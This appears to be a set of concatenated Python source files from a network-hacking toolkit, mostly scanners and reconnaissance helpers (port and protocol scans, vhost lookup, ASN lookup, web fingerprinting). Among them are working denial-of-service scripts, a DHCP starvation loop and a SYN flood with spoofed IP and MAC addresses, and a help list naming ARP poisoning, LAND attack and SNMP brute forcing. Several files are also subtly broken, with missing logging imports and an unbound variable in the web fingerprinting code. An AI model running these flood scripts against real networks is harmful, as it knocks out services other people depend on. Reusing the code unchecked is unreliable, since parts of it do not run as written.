import base64
import sys

import click


@click.command()
@click.argument('f', type=click.File('rb'))
@click.option('-d', 'do_decode', is_flag=True, default=False, help='decode instead of encode')
def cmd_b64(f, do_decode):

    print("WARNING: This tool has problems decoding b64 data.", file=sys.stderr)

    data = f.read()

    if not data:
        print("Empty file or string!")
        return 1

    #decoded = codecs.decode(data, "hex")

    if do_decode:
        print(base64.b64decode(data), file=sys.stdout)
    else:
        print(base64.b64encode(data).decode())


if __name__ == '__main__':
    cmd_b64()



import requests
import requests_cache
from pathlib import Path
import habu.conf
import pickle
import shelve
from bs4 import BeautifulSoup
from pprint import pprint

db = shelve.open(habu.conf.workspace + '/db.shelve', writeback=True)
requests_cache.install_cache(habu.conf.workspace + '/requests_cache')

if not 'requests' in db:
    print('crea')
    db['requests'] = []


def get_urls_from_response(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    urls = [link.get('href') for link in soup.find_all('a')]
    return set(urls)


def crawl(url):
    root = url
    s = requests.Session()
    visited = set()
    to_visit = set([url])

    while True:
        try:
            url = to_visit.pop()
        except KeyError:
            break

        print('GET ', url)

        try:
            visited.add(url)

            r = s.get(url)
            if not r.from_cache:
                db['requests'].append(r)

            print(r.headers)

        except requests.exceptions.MissingSchema:
            continue

        for u in get_urls_from_response(r):
            if u.startswith(root) and u not in visited:
                to_visit.add(u)

    db.close()


if __name__ == '__main__':
    crawl('http://spds.info/')






javascript = [
    'break',
    'case',
    'catch',
    'class',
    'const',
    'continue',
    'debugger',
    'default',
    'delete',
    'do',
    'else',
    'export',
    'extends',
    'finally',
    'for',
    'function',
    'if',
    'import',
    'in',
    'instanceof',
    'new',
    'return',
    'super',
    'switch',
    'this',
    'throw',
    'try',
    'typeof',
    'var',
    'void',
    'while',
    'with',
    'yield',
    # Now, common objects
    'console.log(',
    'document.location.href',
    'screen',
    'window',
]





import ipaddress
#from habu.lib.ip2asn import ip2asn
import json
import logging
import socket
import sys
import pwd
import os
from pprint import pprint

import click
import requests
import requests_cache
from bs4 import BeautifulSoup


def get_vhosts(ip, first=1, no_cache=False):
    """Returns a list of webs hosted on IP (checks bing.com)
    >>> 'www.bing.com' in vhosts(204.79.197.200)
    True
    """

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = "http://www.bing.com/search?q=ip:{ip}&first={first}".format(ip=ip, first=first)

    response = requests.get(url)

    soup = BeautifulSoup(response.text, "html.parser")

    vhosts = set()

    for h2 in soup.find_all('h2'):
        for link in h2.find_all('a'):
            href = link.get('href')

            if href.startswith('http://') or href.startswith('https://'):
                vhost = href.split('/')[2]
                vhosts.add(vhost)

    return list(vhosts)


@click.command()
@click.argument('host')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-p', 'pages', default=10, help='Pages count')
@click.option('-f', 'first', default=1, help='First result to get')
def cmd_vhosts(host, no_cache, pages, first):

    try:
        resolved = socket.gethostbyname(host)
    except Exception:
        logging.error('Invalid IP address or hostname')
        sys.exit(1)

    if host != resolved:
        print(host, '->', resolved, file=sys.stderr)

    vhosts = []

    for num in range(pages):
        #print("results", first+num*10)
        vhosts += get_vhosts(resolved, no_cache=no_cache, first=first+num*10)

    vhosts = list(set(vhosts))

    pprint(vhosts)

if __name__ == '__main__':
    cmd_vhosts()



import click

help_text = [
    ('habu.arpoison', 'ARP cache poisoner *'),
    ('habu.arping', 'ARP ping *'),
    ('habu.arpsniff', 'ARP sniffer *'),
    ('habu.b64', 'Base 64 encoder / decoder'),
    ('habu.contest', 'Check internet connection capabilities'),
    ('habu.dhcp_discover', 'Find DHCP servers on local network'),
    ('habu.dhcp_starvation', 'DHCP starvation attack'),
    ('habu.eicar', 'Print the EICAR test string'),
    ('habu.forkbomb', 'Show various forkbomb examples'),
    ('habu.hasher', 'Calculate hashes using various algorithms'),
    ('habu.help', 'Print this help message'),
    ('habu.ip', 'Show your public IP'),
    ('habu.ip2asn', 'IP2ASN and another IP data'),
    ('habu.isn', 'TCP ISN analyzer'),
    ('habu.karma', 'Check an IP against a lot of Threat Intelligence lists'),
    ('habu.land', 'LAND attack'),
    ('habu.ping', 'Simple ICMP ping'),
    ('habu.snmp_crack', 'Simple SNMP brute forcer'),
    ('habu.synflood', 'SYN Flood attack'),
    ('habu.tcpflags', 'TCP flags analyzer'),
    ('habu.tcpscan', 'Simple TCP port scanner'),
    ('habu.traceroute', 'Simple traceroute'),
    ('habu.webid', 'Web technologies identificator'),
    ('habu.xor', 'XOR cipher'),
]

@click.command()
def cmd_help():
    """Habu help"""

    print('* = Need root privileges')

    for c, h in help_text:
        print('%-20s%-12s' % (c, h))

if __name__ == '__main__':
    cmd_help()



from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import (BOOTP, DHCP, ICMP, IP, TCP, UDP, Ether, RandMAC, conf,
                       get_if_raw_hwaddr, sr1, srp)


@click.command()
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-t', 'timeout', default=1, help='Time (seconds) to wait for responses')
@click.option('-s', 'sleeptime', default=0, help='Time (seconds) between requests')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    conf.checkIPaddr = False

    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip = IP(src="0.0.0.0",dst="255.255.255.255")
    udp = UDP(sport=68, dport=67)
    dhcp = DHCP(options=[("message-type","discover"),"end"])

    while True:
        bootp = BOOTP(chaddr=str(RandMAC()))
        dhcp_discover = ether / ip / udp / bootp / dhcp
        ans, unans = srp(dhcp_discover, timeout=1)      # Press CTRL-C after several seconds

        for _, pkt in ans:
            if verbose:
                print(pkt.show())
            else:
                print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))

        sleep(sleeptime)


if __name__ == '__main__':
    cmd_dhcp_starvation()



from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr1

from habu.lib.firewall import Firewall


@click.command()
@click.option('--disable', is_flag=True, default=False, help='Disable firewalling')
@click.option('--no-rst', is_flag=True, default=False, help='Disable TCP RST output packets')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_firewall(disable, no_rst, verbose):

    fw = Firewall()

    if not any([disable, no_rst]):
        print("Nothing to do, use --help to see the available options.")

    if verbose:
        fw.verbose = verbose

    if disable:
        fw.disable()

    if no_rst:
        fw.no_rst()

    return True

if __name__ == '__main__':
    cmd_firewall()



import sys
import traceback
from functools import wraps
from threading import Semaphore
from concurrent.futures import ThreadPoolExecutor


def threads(n, queue_max=None):

    def decorator(f):

        pool = ThreadPoolExecutor(n)
        sem_max = queue_max

        if sem_max is None:
            sem_max = n

        sem = Semaphore(sem_max)

        def wait():
            for _ in range(sem_max):
                sem.acquire()

            for _ in range(sem_max):
                sem.release()

        f.wait = wait

        def exception_catcher(f, *args, **kwargs):
            try:
                return f(*args, **kwargs)
            except Exception:
                print('[tomorrow3] Caught exception.', file=sys.stderr)
                traceback.print_exc()
                sys.exit(-1)

        @wraps(f)
        def wrapped(*args, **kwargs):

            sem.acquire(blocking=True)
            future = pool.submit(exception_catcher, f, *args, **kwargs)
            future.add_done_callback(lambda _: sem.release())

            return future

        return wrapped

    return decorator



import logging
import re
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import IP, TCP, conf, sr, sr1


@click.command()
@click.argument('ip')
@click.option('-p', 'port', default='80', help='Ports to use (default: 80) example: 20-23,80,135')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-f', 'flags', default='S', help='Flags to use (default: S)')
@click.option('-s', 'sleeptime', default=None, help='Time between probes (default: send all together)')
@click.option('-t', 'timeout', default=2, help='Timeout for each probe (default: 2 seconds)')
@click.option('-a', 'show_all', is_flag=True, default=False, help='Show all responses (default: Only containing SYN flag)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_tcpscan(ip, port, iface, flags, sleeptime, timeout, show_all, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    port_regex = r'^[0-9,-]+$'

    if not re.match(port_regex, port):
        logging.critical("Invalid port specification")
        return False

    ports = []

    for p in str(port).split(','):
        if '-' in p:
            first, last = p.split('-')
            for n in range(int(first), int(last)+1):
                ports.append(n)
        else:
            ports.append(int(p))

    out = "{port} {sflags} -> {rflags}"

    pkts = IP(dst=ip)/TCP(flags=flags, dport=ports)

    if sleeptime:
        res = []
        for pkt in pkts:
            logging.info(pkt.summary())
            _ = sr1(pkt)
            if _:
                logging.info(_.summary())
                res.append((pkt, _))
    else:
        res, unans = sr(pkts, verbose=verbose)

    for s,r in res:
        if show_all or 'S' in r.sprintf(r"%TCP.flags%"):
            print(out.format(
                port=s[TCP].dport,
                sflags=s.sprintf(r"%TCP.flags%"),
                rflags=r.sprintf(r"%TCP.flags%")
            ))

if __name__ == '__main__':
    cmd_tcpscan()



from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *


@click.command()
#@click.option('-i', 'iface', default=None, help='Interface to use')
#@click.option('-t', 'timeout', default=1, help='Time (seconds) to wait for responses')
@click.option('-s', 'src', default=None, help='Show only packets from source')
@click.option('-d', 'dst', default=None, help='Show only packets from destination')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_icmp_data(src, dst, verbose):

    data = b""

    conf.verb = False

    # rdpcap comes from scapy and loads in our pcap file
    packets = rdpcap('/home/f/Downloads/ch6.pcap')

    # Let's iterate through every packet
    for packet in packets:
        if ICMP in packet:
            if not src or packet[IP].src == src:
                if not dst or packet[IP].dst == dst:
                    #print(packet[Raw].load)
                    data += packet[Raw].load
                    #packet.show()
                    #print(packet)

    with open('out', 'wb') as out:
        out.write(data)

    print(data)
    print(data.decode(errors='ignore'))

if __name__ == '__main__':
    cmd_icmp_data()



import logging
import sys
from random import randint

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import IP, TCP, Ether, RandMAC, conf, sendp


@click.command()
@click.argument('ip')
@click.option('-i', 'interface', default=None, help='Wich interface to use (default: auto)')
@click.option('-c', 'count', default=0, help='How many packets send (default: infinit)')
@click.option('-p', 'port', default=135, help='Port to use (default: 135)')
@click.option('-2', 'forgemac', is_flag=True, default=False, help='Forge layer2/MAC address (default: No)')
@click.option('-3', 'forgeip', is_flag=True, default=False, help='Forge layer3/IP address (default: No)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):

    conf.verb = False

    if interface:
        conf.iface = interface

    layer2 = Ether()

    layer3 = IP()
    layer3.dst = ip

    layer4 = TCP()
    layer4.dport = port

    pkt = layer2 / layer3 / layer4

    counter = 0

    print("Please, remember to block your RST responses", file=sys.stderr)

    while True:
        if forgeip:
            pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()

        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        sendp(pkt)
        counter += 1

        if count != 0 and counter == count:
            break

    return True

if __name__ == '__main__':
    cmd_synflood()




import ipaddress

import dns.resolver
import pycountry


def ip2asn(ipaddr):
    """Returns the ASN data associated with an IP (v4 or v6)

    >>> from pprint import pprint
    >>> pprint(ip2asn('8.8.8.8'))
    {'asn': '15169',
     'asname': 'GOOGLE - Google Inc., US',
     'cc': 'US',
     'country': 'United States',
     'net': '8.8.8.0/24',
     'rir': 'ARIN'}
    >>> pprint(ip2asn('2001:4860:4860::8888'))
    {'asn': '15169',
     'asname': 'GOOGLE - Google Inc., US',
     'cc': 'US',
     'country': 'United States',
     'net': '2001:4860::/32',
     'rir': 'ARIN'}
    >>> pprint(ip2asn('unk'))
    None
    """

    try:
        ip = ipaddress.ip_network(ipaddr)
    except ValueError:
        return None

    if ip.is_private:
        return None

    if ip.version == 4:

        a, b, c, d = str(ip.exploded).split('/')[0].split('.')
        reversed = "%s.%s.%s.%s" % (d, c, b, a)
        name = "%s.origin.asn.cymru.com" % (reversed)

    else:
        only_addr = str(ip.exploded).split('/')[0].replace(':', '')

        reversed = ''

        for number in only_addr[::-1]:

            reversed += number
            reversed += '.'

        reversed = reversed.rstrip('.')

        name = "%s.origin6.asn.cymru.com" % (reversed)

    try:
        response = dns.resolver.query(name, 'TXT')
    except:
        return None

    # "15169 | 8.8.4.0/24 | US | arin |"
    r = {}
    r['asn'] = response[0].to_text().split('|')[0].strip(" \"").split(' ')[0]
    r['net'] = response[0].to_text().split('|')[1].strip(" \"")
    r['cc'] = response[0].to_text().split('|')[2].strip(" \"")
    r['rir'] = response[0].to_text().split('|')[3].strip(" \"").upper()
    r['asname'] = 'unknown'

    # Convert ISO Contry name to real country name (AR -> Argentina)
    try:
        r['country'] = pycountry.countries.lookup(r['cc']).name
    except KeyError:
        r['country'] = ''

    # Get AS Name
    # "15169 | US | arin | 2000-03-30 | GOOGLE - Google Inc.,US"
    try:
        name = "AS%s.asn.cymru.com" % (r['asn'])
        response = dns.resolver.query(name, 'TXT')
        r['asname'] = response[0].to_text().split('|')[4].strip(" \"")
    except:
        pass

    return(r)


if __name__ == '__main__':
    print(ip2asn('8.8.8.8'))





import logging

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, TCP, conf, sr, sr1


@click.command()
@click.argument('ip')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_protoscan(ip, verbose):

    conf.verb = False

    #pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port)
    pkts = IP(dst=ip, proto=(0, 255)) # / TCP(flags=(0, 255), dport=port)

    out = "{:>8} -> {:<8}"

    for pkt in pkts:
        #if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
        print(pkt.show2())
        ans = sr1(pkt, timeout=0.2)
        if ans:
            #if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags):
            #print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%")))
            print(ans.show())

    return True

if __name__ == '__main__':
    cmd_protoscan()



import logging
import re
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ARP, IP, TCP, Ether, conf, srp


@click.command()
@click.argument('ip')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_arping(ip, iface, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)

    for _, pkt in res:
        if verbose:
            print(pkt.show())
        else:
            print(pkt.summary())


if __name__ == '__main__':
    cmd_arping()



import logging
import re
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr, sr1


@click.command()
@click.argument('ip')
#@click.option('-p', 'port', default='80', help='Ports to use (default: 80) example: 20-23,80,135')
@click.option('-i', 'iface', default=None, help='Interface to use')
#@click.option('-f', 'flags', default='S', help='Flags to use (default: S)')
@click.option('-s', 'sleeptime', default=None, help='Time between probes (default: send all together)')
@click.option('-t', 'timeout', default=2, help='Timeout for each probe (default: 2 seconds)')
#@click.option('-a', 'show_all', is_flag=True, default=False, help='Show all responses (default: Only containing SYN flag)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    ans,unans=sr(IP(dst=ip, proto=(0,255))/"SCAPY",retry=0,timeout=2, verbose=True)

    for s,r in ans:
        print(r.summary())
        if not ICMP in r:
            r.show()

if __name__ == '__main__':
    cmd_ipscan()



import json
import logging
import os.path
import sys
from pathlib import Path
from pprint import pprint
import magic
import click
import regex as re
import requests
import requests_cache
from bs4 import BeautifulSoup
import socket
import asyncore
import asyncio

class NClient(asyncore.dispatcher):

    def __init__(self, host, port):
        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connect((host, port))
        self.buffer = bytes('', 'ascii') #'HEAD / HTTP/1.0\r\n\r\n', 'ascii')

    def handle_connect(self):
        pass

    def handle_close(self):
        self.close()

    def handle_read(self):
        print(self.recv(8192))

    def writable(self):
        return (len(self.buffer) > 0)

    def handle_write(self):
        sent = self.send(self.buffer)
        self.buffer = self.buffer[sent:]



class EchoClientProtocol(asyncio.Protocol):
    def __init__(self, message, loop):
        self.message = message
        self.loop = loop

    def connection_made(self, transport):
        transport.write(self.message.encode())
        print('Data sent: {!r}'.format(self.message))

    def data_received(self, data):
        print('Data received: {!r}'.format(data.decode()))

    def connection_lost(self, exc):
        print('The server closed the connection')
        print('Stop the event loop')
        self.loop.stop()


@click.command()
@click.argument('infile', type=click.File('rb'), default='-')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-C', 'crlf', is_flag=True, default=False, help='Use CRLF instead of LF')
def cmd_nc(infile, verbose, crlf):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    HOST = 'www.google.com'
    PORT = 80

    loop = asyncio.get_event_loop()
    message = 'Hello World!'
    coro = loop.create_connection(lambda: EchoClientProtocol(message, loop),
                                  'www.google.com', 80)
    loop.run_until_complete(coro)
    loop.run_forever()
    loop.close()


if __name__ == '__main__':
    cmd_nc()




import click

from habu.lib.forkbomb import bombs, get_bomb


@click.command()
@click.argument('bomb', type=click.Choice(bombs))
def cmd_forkbomb(bomb):
    """Fork Bombs"""
    print(get_bomb(bomb))


if __name__ == '__main__':
    cmd_forkbomb()



import json
import logging
import socket
import sys

import click

from habu.lib.ip2asn import ip2asn


@click.command()
@click.argument('ip')
def cmd_ip2asn(ip):

    try:
        resolved = socket.gethostbyname(ip)
    except Exception:
        logging.error('Invalid IP address or hostname')
        sys.exit(1)

    if ip != resolved:
        print(ip, '->', resolved, file=sys.stderr)

    data = ip2asn(resolved)
    print(json.dumps(data, indent=4))

if __name__ == '__main__':
    cmd_ip2asn()



import json
import logging
import os
import os.path
import pwd
from pathlib import Path

import regex as re
import requests
import requests_cache
from bs4 import BeautifulSoup

DATADIR = Path(os.path.abspath(os.path.join(os.path.dirname(__file__), '../data')))

def webid(url, no_cache=False, verbose=False):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    try:
        r = requests.get(url)
    except Exception as e:
        logging.error(e)
        return False

    #with (DATADIR / 'apps.json').open() as f:
    #    data = json.load(f)

    with (DATADIR / 'apps-habu.json').open() as f:
        data = json.load(f)

    apps = data['apps']
    categories = data['categories']

    #apps.update(data_custom['apps'])
    #categories.update(data_custom['categories'])

    # convertir los strings a listas, para que siempre los valores sean listas
    #for app in apps:
    #    for field in ['url', 'html', 'env', 'script', 'implies', 'excludes']:
    #
    #        if field in apps[app]:
    #            if not isinstance(apps[app][field], list):
    #                apps[app][field] = [apps[app][field]]

    #with (DATADIR / 'apps-habu.json').open('w') as f:
    #    f.write(json.dumps({'apps':apps, 'categories': categories}, indent=4)) #data_custom = json.load(f)

    content = r.text
    soup = BeautifulSoup(content, "lxml")
    tech = {}

    for app in apps:

        version_group = False

        for header in apps[app].get('headers', []):
            if header in r.headers:

                header_regex = apps[app]['headers'][header].split('\;')[0]

                if '\;version:\\' in apps[app]['headers'][header]:
                    version_group = apps[app]['headers'][header].split('\;version:\\')[1]

                match = re.search(header_regex, r.headers[header], flags=re.IGNORECASE)
                if match or not header_regex:
                    logging.info("{app} detected by {header} HTTP header = {header_content}".format(app=app, header=header, header_content=r.headers[header]))
                    if app not in tech:
                        tech[app] = apps[app]

                    if version_group and version_group.isdigit():
                        try:
                            version = match.group(int(version_group))
                            if version:
                                tech[app]['version'] = version
                        except IndexError:
                            pass

        for key in ['script', 'html']:

            version_group = False

            for item in apps[app].get(key, []):
                item_regex = item.split('\;')[0]

                if '\;version:\\' in item:
                    version_group = item.split('\;version:\\')[1]

                match = re.search(item_regex, r.text, flags=re.IGNORECASE & re.MULTILINE)
                if match:
                    logging.info("{app} detected by HTML body with regex {regex}".format(app=app, regex=item_regex))
                    if app not in tech:
                        tech[app] = apps[app]

                    if version_group and version_group.isdigit():

                        try:
                            version = match.group(int(version_group))
                            if version:
                                tech[app]['version'] = version
                        except IndexError:
                            pass

        for url_regex in apps[app].get('url', []):
            match = re.search(url_regex, url, flags=re.IGNORECASE & re.MULTILINE)
            if match:
                logging.info("{app} detected by URL with regex {regex}".format(app=app, regex=url_regex))
                if app not in tech:
                    tech[app] = apps[app]

        for cookie_name in apps[app].get('cookies', []):

            for cookie in r.cookies:
                if cookie_name == cookie.name:
                    logging.info("{app} detected by cookie {cookie}".format(app=app, cookie=cookie.name))

                    if app not in tech:
                        tech[app] = apps[app]

        for meta in apps[app].get('meta', []):

            version_group = False

            for tag in soup.find_all("meta", attrs={'name': meta}):
                meta_regex = apps[app]['meta'][meta]

                if '\;version:\\' in meta_regex:
                    version_group = meta_regex.split('\;version:\\')[1]

                meta_regex = meta_regex.split('\;')[0]

                try:
                    match = re.search(meta_regex, tag['content'], flags=re.IGNORECASE)
                except KeyError:
                    continue

                if match:
                    logging.info("{app} detected by meta {meta} tag with regex {regex}".format(app=app, meta=meta, regex=meta_regex))

                    if app not in tech:
                        tech[app] = apps[app]

                    if version_group and version_group.isdigit():

                        try:
                            version = match.group(int(version_group))
                            if version:
                                tech[app]['version'] = version
                        except IndexError:
                            pass

    for t in list(tech.keys()):
        for imply in tech[t].get('implies', []):
            imply = imply.split('\\;')[0]
            logging.info("{imply} detected because implied by {t}".format(imply=imply, t=t))
            tech[imply] = apps[imply]

    for t in list(tech.keys()):
        try:
            tech[t]['category'] = categories[tech[t]['cats'][0]]['name']
        except KeyError:
            pass

    for t in list(tech.keys()):
        for exclude in tech[t].get('excludes', []):
            logging.info("removing {exlude} because its excluded by {t}".format(exlude=exclude, t=t))
            del(tech[t])

    response = {}
    for t in sorted(tech):
        if 'version' in tech[t]:
            response[t] = version #version.append('{app} {version}'.format(app=t, version=version))
        else:
            response[t] = None #.append('{app}'.format(app=t))

    return response

if __name__ == '__main__':
    print(webid('https://www.woocommerce.com'))
